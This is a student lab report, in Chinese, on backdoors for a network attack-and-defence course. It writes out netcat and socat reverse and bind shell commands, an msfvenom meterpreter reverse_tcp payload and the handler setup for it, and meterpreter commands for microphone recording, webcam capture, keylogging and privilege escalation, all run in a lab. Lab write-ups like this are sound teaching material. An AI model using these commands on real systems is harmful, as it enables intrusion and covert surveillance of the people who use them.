2019-2020-2 20175305张天钰《网络对抗技术》 Exp2 后门原理与实践
知识点概括
后门:
不经过正常认证流程而访问系统的通道。
后门类型:
编译器留后门
操作系统留后门
应用程序中留后门
潜伏于操作系统中或伪装为特定应用的专用后门程序。
后门工具:
netcat:又名nc或ncat,是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
soCat:Netcat++,超级netcat工具。
任何代理、转发等功能都可以用该工具实现。
meterpreter:是一个后门平台。其中有大量零件可调参数,用时组合可以生成可执行文件。
后门启动:
任务计划程序——>新建任务计划——>触发器——>操作程序或脚本——>操作添加参数。
实验步骤
任务一 :使用netcat获取主机操作Shell,cron启动
(1)Linux获得Win Shell
输入ifconfig查看到kali的IP地址:
输入nc -l -p 5305在Linux运行监听
在ncat文件目录下输入ncat.exe -e cmd.exe
192.168.0.104 5305,使Windows反弹连接Linux
kali成功获得Windows的Shell:
(2)Windows获取Linux Shell
输入ipconfig查看本机的IP地址:
输入nc -l -p 5305在Linux运行监听
输入ncat.exe -e cmd.exe 192.168.10.128 5305Widows开始连接Kali运行cmd.exe
Windows成功获取Kali的Shell:
任务二:使用socat获取主机操作Shell,任务计划启动
下载socat
打开计算机管理,在任务计划程序中创建任务,填写任务名称。
新建操作,程序或脚本选择socat.exe,添加参数填写tcp-listen:5305 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5305,同时把cmd.exe的stderr重定向到stdout上:
在Linux端输入socat-tcp:192.168.10.128:5305。完成连接,获得windows shell:
任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 -f exe > 20175305_backdoor.exe
IP地址为控制端IP,即Linux的IP
生成了后门程序:20175305_backdoor.exe
通过ncat.exe -lv 5305 > 20175305_backdoor.exe指令将被控制主机进入接受文件模式
在Linux中执行nc 192.168.0.104 5305 < 20175305_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP
传送接收文件成功
在Kali上使用msfconsole指令进入msf控制台
输入use exploit/multi/handler使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
set LHOST 192.168.10.128,这里用的是LinuxIP,和生成后门程序时指定的IP相同
set LPORT 5305,同样要使用相同的端口
设置完成后,执行监听exploit
运行Windows下的后门程序20175305_backdoor.exe
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
任务四:使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.输入record_mic 指令可以截获一段时长的音频,录制完毕自动输出保存路径:
2.输入webcam_snap指令可以使用摄像头进行拍照,拍摄完毕自动输出保存路径,并自动打开图像
3.输入使用keyscan_start和keyscan_dump指令获取目标机击键记录:
4.输入screenshot指令可以进行截屏
5.输入getsystem指令进行提权操作:
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载不是正规途径的文件
(2)例举你知道的后门如何启动起来(win及linux)的方式?
程序自启动;开机自启动;
(3)Meterpreter有哪些给你映像深刻的功能?
各个功能太完备了,想到黑客有可能获取这些,感到非常可怕,摄像头录音等
(4)如何发现自己有系统有没有被安装后门?
灵活使用防火墙和杀毒软件,查找不明文件来源
实验体会
本次实验使我对这门课进一步认识,本次实验内容并不难,通过学习视频资料就可以做,但是这次实验给我增加了浓厚的兴趣,后门这块内容知识十分有趣,倒不如说计算机真的神奇,还有什么比进一步学习网络对抗技术,学习计算机更神秘呢。